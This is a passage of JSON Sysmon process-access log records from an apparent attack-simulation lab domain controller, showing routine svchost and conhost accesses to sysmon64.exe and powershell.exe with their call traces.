07:58:56.767","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4637,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.767\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.767","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4638,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.767\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.767","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4639,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.767\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.767","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4640,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.767\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.767","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4641,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.767\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.767","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4642,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.767\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.767","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4643,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.767\r\nSourceProcessGUID: {41C8662E-20BF-5F25-0000-001074C30600}\r\nSourceProcessId: 5076\r\nSourceThreadId: 4416\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nTargetProcessId: 4240\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.767","SourceProcessGUID":"{41C8662E-20BF-5F25-0000-001074C30600}","SourceProcessId":"5076","SourceThreadId":"4416","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20C0-5F25-0000-001025EA0600}","TargetProcessId":"4240","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4644,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.798\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nTargetProcessId: 4240\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.798","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20C0-5F25-0000-001025EA0600}","TargetProcessId":"4240","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
